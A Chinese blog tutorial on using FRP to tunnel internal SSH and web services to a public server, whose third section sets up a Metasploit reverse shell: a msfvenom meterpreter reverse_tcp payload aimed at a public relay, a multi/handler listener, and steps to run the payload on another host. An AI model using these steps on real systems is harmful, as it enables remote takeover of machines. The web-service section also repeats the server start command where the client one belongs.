前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Frp内网穿透

Frp内网穿透

作者头像
全栈程序员站长
发布2022-09-30 11:20:19
1.3K0
发布2022-09-30 11:20:19
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

Frp内网穿透

​ 内网穿透从本质上来讲也是端口映射,两者都是将内网地址映射到公网可访问的地址,而区别是端口映射直接在路由器中配置即可,而内网穿透配置的端口映射则需要客户端和服务端进行绑定后实现,相当于客户端和服务端之间建立了一条隧道,然后访问服务端的请求会通过隧道转发给内网主机,该情况多用于没有公网 IP 的情况下使用;

​ frp是一个高性能的反向代理应用,可以轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http, https等协议类型,可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网;

代码语言:javascript
复制
## 中文文档地址: 
https://gofrp.org/docs/ 
## github 下载地址: 
https://github.com/fatedier/frp/releases

​ Frp有客户端和服务端,根据所安装主机的系统下载好对应的版本,这里下载了两个版本,一个windows版本,一个linux版本;

1、映射内网SSH服务

​ 将linux版本文件通过xshell上传到云服务器,并进行解压;

代码语言:javascript
复制
## 解压文件
tar xf frp_0.33.0_linux_amd64.tar.gz
代码语言:javascript
复制
## 文件涵义
frpc			客户端程序 
frpc_full.ini	客户端完整配置文件 
frpc.ini		客户端简易配置文件 
frps			服务端程序 
frps_full.ini	服务端完整配置文件 
frps.ini		服务端简易配置文件

​ 查看简易配置文件,配置了侦听端口为7000,即服务端与客户端通讯的端口;

​ 启动服务端程序;

代码语言:javascript
复制
 ## 以简易配置启动服务端程序
 ./frps -c ./frps.ini 

​ 在本地CentOS7中解压linux版本文件,并修改客户端简易配置文件frpc.ini;

代码语言:javascript
复制
## 客户端简易配置文件frpc.ini
[common]
server_addr = 123.456.789.111     ## 远程云主机的公网ip地址
server_port = 7000                ## 服务端侦听的端口
[ssh] 
type = tcp 					## 协议类型					
local_ip = 127.0.0.1 		## 本地的ip地址
local_port = 22 			## 本地的端口
remote_port = 6000 			## 映射到服务端的端口

​ 启动客户端程序;

代码语言:javascript
复制
## 以简易配置启动客户端程序
./frpc -c frpc.ini

​ 此时云主机上服务端会显示已经成功的日志信息;

​ 在云主机上查看6000端口的状态,显示已经配置了TCP监听;

​ 通过xshell访问云主机公网ip的6000端口就可以访问内网主机;

2、映射内网Web服务

​ 配置服务端的配置文件frps.ini,vhost_http_port为http服务访问端口,vhost_https_port为https服务访问端口,此处以http服务为例;

代码语言:javascript
复制
## frps.ini配置文件
[common]
bind_port = 7000
vhost_http_port = 8080

​ 配置完成后启动服务端程序;

代码语言:javascript
复制
 ## 以简易配置启动服务端程序
 ./frps -c ./frps.ini 

​ 更改客户端的配置文件frpc.ini;

代码语言:javascript
复制
## frpc.ini配置文件
[common]
server_addr = 123.456.789.111   ## 云主机的公网IP
server_port = 7000				## 服务端绑定的端口

[web]
type = http
local_port = 80					## 本地Web服务的端口
custom_domains = www.yourdomain.com	 ## 解析到公网IP上的域名

​ 启动客户端程序;

代码语言:javascript
复制
 ## 以简易配置启动客户端程序
 ./frps -c ./frps.ini 

​ 服务端可以查看到成功链接的日志信息;

​ 访问域名:8080就可以访问本地的Web服务;

3、配置MSF接收来自公网的shell

​ 服务端配置文件不用改变,修改客户端配置文件即可,然后启动客户端程序;

代码语言:javascript
复制
## frpc.ini配置文件
[common]
server_addr = 123.456.789.111   ## 云主机的公网IP
server_port = 7000				## 服务端绑定的端口

[msf] 
type = tcp 
local_port = 4444 		## 本地待监听端口
local_ip = 127.0.0.1 
remote_port = 8085 		## 云主机映射端口

​ 生成 payload ,LHOST 指定为公网 IP,LPORT 指定为公网映射端口;

代码语言:javascript
复制
## 使用msfvenom生成payload
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=123.456.789.111 LPORT=8085 -b "\x00" -f elf -o xuyu 

​ 本地启动 MSF 并配置侦听,此时监听LOST为本地ip地址,LPORT为frpc.ini配置文件中本地的端口;

代码语言:javascript
复制
## MSF配置本地监听
use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp 
set LHOST 192.168.1.105
set LPORT 4444 
exploit 

​ 将payload复制到另一台Centos中,并执行;

代码语言:javascript
复制
## 复制payload并执行
scp xuyu root@192.168.1.6:/root/
chmod +x xuyu
./xuyu

​ MSF 成功接收 shell ;

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/194252.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年9月13日 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Frp内网穿透
    • 1、映射内网SSH服务
      • 2、映射内网Web服务
        • 3、配置MSF接收来自公网的shell
        相关产品与服务
        云服务器
        云服务器(Cloud Virtual Machine,CVM)提供安全可靠的弹性计算服务。 您可以实时扩展或缩减计算资源,适应变化的业务需求,并只需按实际使用的资源计费。使用 CVM 可以极大降低您的软硬件采购成本,简化 IT 运维工作。
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档